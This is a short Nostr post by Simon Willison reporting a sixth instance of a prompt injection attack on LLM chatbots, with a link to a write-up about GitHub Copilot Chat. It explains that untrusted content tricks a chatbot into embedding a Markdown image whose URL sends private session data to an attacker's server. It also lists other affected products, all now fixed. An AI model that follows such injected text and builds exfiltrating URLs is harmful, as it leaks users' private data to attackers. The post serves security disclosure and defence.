What is Nostr?
Simon Willison /
npub1gv2…tlwl
2024-06-16 00:57:15

Simon Willison on Nostr: The 6th example I've seen of the same prompt injection attack against LLM chatbots: ...

The 6th example I've seen of the same prompt injection attack against LLM chatbots: https://embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/

The attack involves tricking an LLM chatbot with access to both private and untrusted data to embed a Markdown image with a URL to an attacker's server where that URL leaks private data extracted from the session.

We've now seen this same attack in ChatGPT itself, Google Bard, Writer.com, Amazon Q and Google NotebookLM (all now fixed, thankfully).

My collection: https://simonwillison.net/tags/markdownexfiltration/
Author Public Key
npub1gv26rplqyjqcfyhxryuqjwaxs0dwve3y6gpv6smn3hjm3wse3s8squtlwl